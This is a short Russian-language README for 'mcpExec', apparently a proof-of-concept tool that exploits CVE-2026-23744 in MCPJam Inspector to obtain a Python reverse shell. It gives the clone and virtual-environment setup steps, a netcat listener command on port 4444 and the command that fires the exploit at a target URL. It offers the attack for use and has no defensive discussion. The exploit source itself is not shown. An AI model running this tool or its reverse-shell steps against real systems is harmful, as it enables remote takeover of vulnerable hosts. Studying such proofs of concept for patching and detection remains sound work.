
PoC для CVE-2026-23744 для Python реверс-шелла
mcpExec — это инструмент, который использует уязвимость CVE-2026-23744 для получения обратного шелла через URL уязвимой установки MCPJam Inspector.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
Чтобы выйти из venv:
deactivate
Откройте слушатель, чтобы эксплойт сработал:
nc -nvlp 4444
Эта команда предоставит вам обратный шелл (если в целевой системе установлен Python3).
./mcpExec.py http://localhost:6274